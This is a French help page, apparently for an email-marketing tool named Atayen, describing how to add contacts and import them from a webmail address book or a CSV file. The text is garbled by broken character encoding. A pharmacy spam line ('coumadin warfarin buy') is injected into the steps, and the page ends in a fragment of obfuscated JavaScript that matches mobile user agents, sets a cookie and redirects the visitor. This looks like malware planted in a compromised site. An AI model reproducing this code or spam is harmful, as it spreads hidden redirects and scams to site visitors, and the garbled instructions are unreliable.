Cliquez sur le bouton « Ajouter un contact »: un formulaire s’affiche.

ajout-contact
Formulaire d’ajout de contact.

Renseignez les champs (notamment obligatoires) et enregistrez, le nouveau contact sera ajoutAi?? Ai?? la liste des contacts.

• Import.

Pour se connecter Ai?? cette interface, cliquez sur « Importer des abonnAi??s » dans le menu principal, 2 mAi??thodes d’import sont possibles

Import depuis un carnet d’adresses.

Import contact depuis carnet
Import de contacts depuis un carnet d’adresses.

SAi??lectionnez la messagerie, par exemple Gmail.
S’authentifiez vous via le pop-up affichAi?? (login puis mot de passe demandAi??s).
Autorisez l’affichage des contacts par Atayen.
SAi??lectionnez les adresses dans la liste et validez.

Import depuis fichier .csv ou .txt

• Cliquez sur le bouton « Importer depuis … ».
import fichier
Import de contacts depuis fichier csv.
  • SAi??lectionnez un fichier d’adresses e-mails, de format texte ou csv depuis votre disque dur (50 00 adresses max par fichier).
  • coumadin warfarin buy

• Choisissez d’enregistrer dans une population existante ou d’en crAi??er une nouvelle.
  • Enregistrez. La nouvelle liste est ajoutAi??e.

ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}